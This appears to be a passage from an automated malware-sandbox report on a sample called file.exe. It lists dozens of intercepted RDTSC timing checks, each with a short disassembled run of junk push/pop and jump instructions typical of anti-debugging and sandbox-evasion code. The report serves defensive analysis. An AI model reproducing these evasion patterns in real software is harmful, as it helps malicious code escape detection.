                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291234 second address: 1291253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFEB92DE1F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291253 second address: 129126F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFEB91CA556h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291801 second address: 1291807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291807 second address: 129180B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291ADB second address: 1291AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007EFEB92DE1E6h 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1292687 second address: 129268B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129299C second address: 12929E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F1h 0x00000007 pushad 0x00000008 jmp 00007EFEB92DE1F5h 0x0000000d jp 00007EFEB92DE1E6h 0x00000013 jmp 00007EFEB92DE1EAh 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007EFEB92DE1EAh 0x00000025 push esi 0x00000026 pop esi 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296BEA second address: 1296C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007EFEB91CA546h 0x0000000a popad 0x0000000b jc 00007EFEB91CA54Ch 0x00000011 jns 00007EFEB91CA546h 0x00000017 popad 0x00000018 pushad 0x00000019 push edi 0x0000001a jnp 00007EFEB91CA546h 0x00000020 pop edi 0x00000021 push edx 0x00000022 jno 00007EFEB91CA546h 0x00000028 pop edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C16 second address: 1296C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296D78 second address: 1296D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129716D second address: 1297173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12972D8 second address: 12972DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129743F second address: 1297449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFEB92DE1E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A54F1 second address: 12A54F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A54F5 second address: 12A5501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A5501 second address: 12A5505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3787 second address: 12A378B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3BD4 second address: 12A3BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Dh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3BE7 second address: 12A3BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A3D42 second address: 12A3D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB91CA559h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A3D61 second address: 12A3D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1ECh 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007EFEB92DE1E6h 0x00000017 jmp 00007EFEB92DE1F1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A400E second address: 12A4049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007EFEB91CA559h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4049 second address: 12A404D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4178 second address: 12A4185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007EFEB91CA546h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A459B second address: 12A45A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007EFEB92DE1E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A45A5 second address: 12A45D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jo 00007EFEB91CA546h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 jp 00007EFEB91CA55Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEF3E second address: 12AEF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEF44 second address: 12AEF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEF48 second address: 12AEF76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007EFEB92DE1E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007EFEB92DE1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEF76 second address: 12AEFAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007EFEB91CA558h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12AEFAF second address: 12AEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C10BF second address: 12C10C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C0C8A second address: 12C0C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C5D65 second address: 12C5D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC3C6 second address: 12CC3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12CC3CC second address: 12CC3D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA546h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D562F second address: 12D5642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007EFEB92DE1E6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5642 second address: 12D564A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D564A second address: 12D564F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D564F second address: 12D565D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D565D second address: 12D5663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5663 second address: 12D5667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D5667 second address: 12D567B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9E2D second address: 12D9E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9E31 second address: 12D9E50 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007EFEB92DE1F1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9E50 second address: 12D9E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9E67 second address: 12D9E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007EFEB92DE1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9FAB second address: 12D9FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12D9FB1 second address: 12D9FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA101 second address: 12DA10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA278 second address: 12DA291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB92DE1F5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA291 second address: 12DA295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA569 second address: 12DA584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFEB92DE1F6h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA584 second address: 12DA59A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA59A second address: 12DA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA723 second address: 12DA729 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA729 second address: 12DA745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jng 00007EFEB92DE1E6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jng 00007EFEB92DE1E6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA745 second address: 12DA75D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007EFEB91CA548h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007EFEB91CA546h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA75D second address: 12DA761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DA761 second address: 12DA76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDD1 second address: 12DEDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDD9 second address: 12DEDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDE4 second address: 12DEDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDE8 second address: 12DEDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDEC second address: 12DEDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007EFEB92DE1E8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DEDFE second address: 12DEE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFEB91CA546h 0x0000000a jne 00007EFEB91CA546h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EAD0A second address: 12EAD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE957 second address: 12EE95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE95B second address: 12EE965 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB92DE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE965 second address: 12EE98E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA54Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007EFEB91CA552h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE98E second address: 12EE993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12EE993 second address: 12EE999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F0307 second address: 12F030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12F030C second address: 12F0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E7E89 second address: 12E7E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E7E8D second address: 12E7E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE537 second address: 12FE53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE53F second address: 12FE544 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12FE253 second address: 12FE266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13009D3 second address: 13009E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFEB91CA546h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13009E1 second address: 13009F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFEB92DE1E6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007EFEB92DE1E6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13009F4 second address: 13009F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13009F8 second address: 1300A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1300A04 second address: 1300A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EC06 second address: 130EC0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EC0A second address: 130EC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EC18 second address: 130EC2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jno 00007EFEB92DE1E6h 0x0000000d jnl 00007EFEB92DE1E6h 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130ED9A second address: 130EDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDA0 second address: 130EDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDA4 second address: 130EDA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDA8 second address: 130EDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDB2 second address: 130EDB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDB8 second address: 130EDC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007EFEB92DE1E6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDC6 second address: 130EDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130EDCA second address: 130EDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F073 second address: 130F091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFEB91CA546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007EFEB91CA546h 0x00000016 jns 00007EFEB91CA546h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F657 second address: 130F672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F672 second address: 130F676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 130F7C7 second address: 130F7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007EFEB92DE1E6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315D66 second address: 1315D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1315D6A second address: 1315D70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D020C second address: 58D0212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0212 second address: 58D0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
